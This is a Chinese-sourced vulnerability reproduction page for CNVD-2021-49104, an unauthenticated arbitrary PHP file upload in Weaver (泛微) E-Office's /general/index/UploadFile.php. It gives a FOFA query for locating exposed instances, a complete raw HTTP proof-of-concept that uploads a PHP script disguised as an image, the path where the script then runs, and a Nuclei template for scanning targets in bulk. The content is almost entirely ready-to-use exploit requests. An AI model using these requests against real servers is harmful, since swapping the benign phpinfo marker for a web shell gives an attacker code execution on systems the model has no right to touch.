泛微 (Weaver) E-Office UploadFile.php arbitrary file upload vulnerability, CNVD-2021-49104
Vulnerability description
In /general/index/UploadFile.php the uploaded file is not filtered strictly, so files of any type can be uploaded without restriction; an attacker can use this to obtain control of the site directly.
Vulnerability reproduction
FOFA query: app="泛微-EOffice"
The login page looks like this:
PoC:
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Content-Length: 192

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--
Then request /images/logo/logo-eoffice.php: the uploaded logo is stored under that fixed name (with the submitted .php extension) regardless of the file name sent, so this is where the uploaded script is served.
Nuclei YAML template for scanning in bulk
id: CNVD-2021-49104

info:
  name: Pan Micro E-office File Uploads
  author: pikpikcu
  severity: critical
  description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
  reference:
    - https://chowdera.com/2021/12/202112200602130067.html
    - http://v10.e-office.cn
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
    cvss-score: 9.9
    cwe-id: CWE-434
  remediation: Pan Wei has released an update to resolve this vulnerability.
  tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
  metadata:
    max-request: 2

http:
  - raw:
      - |
        POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

        --e64bdf16c554bbc109cecef6451c26a4
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
        Content-Type: image/jpeg

        <?php echo md5('CNVD-2021-49104');?>
        --e64bdf16c554bbc109cecef6451c26a4--

      - |
        GET /images/logo/logo-eoffice.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "94d01a2324ce38a2e29a629c54190f67"

      - type: status
        status:
          - 200
Category:
Vulnerability reproduction / 泛微OA